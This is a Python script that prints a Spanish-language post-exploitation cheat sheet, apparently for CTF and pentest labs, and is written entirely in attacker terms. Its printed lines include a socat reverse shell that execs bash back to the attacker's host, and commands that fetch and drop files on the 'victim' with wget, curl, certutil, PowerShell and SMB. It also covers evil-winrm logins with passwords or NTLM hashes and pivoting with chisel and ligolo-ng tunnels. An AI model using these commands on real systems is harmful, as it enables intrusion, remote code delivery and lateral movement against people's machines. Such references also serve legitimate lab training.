import sys

class Colors:
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'

def _cmd(c): sys.stdout.buffer.write(f"  {Colors.OKGREEN}{c}{Colors.ENDC}\n".encode('utf-8')); sys.stdout.buffer.flush()
def _tip(c): print(f"  {Colors.OKCYAN}# {c}{Colors.ENDC}")
def _header(t): print(f"\n{Colors.BOLD}── {t} ──{Colors.ENDC}\n")
def _warn(c): print(f"  {Colors.WARNING}[!] {c}{Colors.ENDC}")

def run(target_ip="TU_IP", port="4444"):
    print(f"{Colors.BOLD}{'='*60}{Colors.ENDC}")
    print(f"{Colors.WARNING}  SHELL UPGRADE v2.0 — OBSIDIAN TIER{Colors.ENDC}")
    print(f"{Colors.BOLD}{'='*60}{Colors.ENDC}")
    print(f"\n{Colors.WARNING}[!] Ejecutá estos pasos INMEDIATAMENTE después de obtener shell{Colors.ENDC}")

    _header("MÉTODO 1: Python PTY (más común)")
    _tip("Paso 1 — En la shell de la víctima:")
    _cmd("python3 -c 'import pty;pty.spawn(\"/bin/bash\")'")
    _cmd("python -c 'import pty;pty.spawn(\"/bin/bash\")'   # Si no hay python3")
    _cmd("script /dev/null -c bash                          # Alternativa sin python")
    print()
    _tip("Paso 2 — CTRL+Z (suspender la shell)")
    print()
    _tip("Paso 3 — En TU terminal Kali:")
    _cmd("stty raw -echo; fg")
    print()
    _tip("Paso 4 — De vuelta en la víctima:")
    _cmd("export TERM=xterm; export SHELL=bash")
    _cmd("stty rows 38 columns 180")
    _warn("Ajustá rows/columns a tu pantalla: corrí 'stty size' en tu Kali")
    print(f"\n  {Colors.OKGREEN} Ahora tenés: historial ↑↓, TAB, CTRL+C sin perder shell, sudo funcional{Colors.ENDC}\n")

    _header("MÉTODO 2: Socat — TTY Perfecta en 1 paso (preferido)")
    _tip("En TU Kali:")
    _cmd(f"socat file:`tty`,raw,echo=0 tcp-listen:4445")
    _tip("En la víctima:")
    _cmd(f"socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{target_ip}:4445")
    _warn("Subir socat si no está: wget http://TU_IP/socat -O /tmp/socat && chmod +x /tmp/socat")
    print()

    _header("MÉTODO 3: rlwrap — Para shells Windows CMD/PowerShell")
    _tip("En TU Kali, en vez de 'nc -lvnp PORT' usá:")
    _cmd(f"rlwrap nc -lvnp {port}")
    _tip("rlwrap agrega historial y flechas a shells que no tienen TTY nativa (Windows)")
    _cmd("sudo apt install rlwrap -y  # Si no está instalado")
    print()

    _header("MÉTODO 4: Evil-WinRM con PTY directa (Windows)")
    _cmd(f"evil-winrm -i {target_ip} -u USUARIO -p CONTRASEÑA")
    _cmd(f"evil-winrm -i {target_ip} -u USUARIO -H HASH_NTLM")
    _tip("Evil-WinRM ya trae historial y colores — no necesita upgrade")
    print()

    _header("PIVOTING — Port Forwarding hacia Servicios Internos")
    print(f"  {Colors.WARNING}[SSH Local Port Forward — acceder a servicio interno de la víctima]{Colors.ENDC}")
    _tip("Ej: víctima tiene MySQL en 127.0.0.1:3306 y no está expuesto")
    _cmd(f"ssh -L 3306:127.0.0.1:3306 user@{target_ip}")
    _cmd(f"mysql -h 127.0.0.1 -P 3306 -u root  # En tu Kali ahora")
    print()
    print(f"  {Colors.WARNING}[SSH Remote Port Forward — exponer tu listener a la víctima]{Colors.ENDC}")
    _cmd(f"ssh -R 4444:127.0.0.1:4444 user@{target_ip}")
    print()
    print(f"  {Colors.WARNING}[Chisel — Port Forward sin SSH (la joya para CTFs)]{Colors.ENDC}")
    _tip("En TU Kali (servidor):")
    _cmd(f"./chisel server --reverse --port 8888")
    _tip("En la víctima (cliente):")
    _cmd(f"./chisel client {target_ip}:8888 R:3306:127.0.0.1:3306")
    _tip("Descargar chisel: https://github.com/jpillora/chisel/releases")
    print()
    print(f"  {Colors.WARNING}[Ligolo-ng — VPN completa sobre el túnel (Insane/Pro Labs)]{Colors.ENDC}")
    _tip("En TU Kali (proxy):")
    _cmd("sudo ./proxy -selfcert")
    _tip("En la víctima (agent):")
    _cmd(f"./agent -connect {target_ip}:11601 -ignore-cert")
    print()

    _header("TRANSFERIR ARCHIVOS A LA VÍCTIMA")
    print(f"  {Colors.WARNING}[HTTP — El más fácil]{Colors.ENDC}")
    _tip("En Kali:")
    _cmd("python3 -m http.server 80")
    _tip("En la víctima (Linux):")
    _cmd(f"wget http://{target_ip}/archivo -O /tmp/archivo")
    _cmd(f"curl http://{target_ip}/archivo -o /tmp/archivo")
    _tip("En la víctima (Windows):")
    _cmd(f"certutil -urlcache -split -f http://{target_ip}/archivo.exe archivo.exe")
    _cmd(f"iwr http://{target_ip}/archivo.exe -OutFile archivo.exe")
    _cmd(f'(New-Object Net.WebClient).DownloadFile("http://{target_ip}/archivo","C:\\\\Temp\\\\archivo")')
    print()
    print(f"  {Colors.WARNING}[Base64 — Cuando no hay wget/curl/certutil]{Colors.ENDC}")
    _tip("En Kali:")
    _cmd("base64 archivo -w 0")
    _tip("En la víctima:")
    _cmd("echo 'BASE64_AQUI' | base64 -d > /tmp/archivo")
    _cmd("[System.Convert]::FromBase64String('BASE64') | Set-Content archivo.exe -Encoding Byte  # PowerShell")
    print()
    print(f"  {Colors.WARNING}[SMB — Para Windows (no requiere herramientas extra en la víctima)]{Colors.ENDC}")
    _tip("En Kali:")
    _cmd("impacket-smbserver share $(pwd) -smb2support")
    _tip("En la víctima (Windows):")
    _cmd(f"copy \\\\{target_ip}\\share\\archivo.exe .\\archivo.exe")
    print()
    print(f"{Colors.BOLD}{'='*60}{Colors.ENDC}")
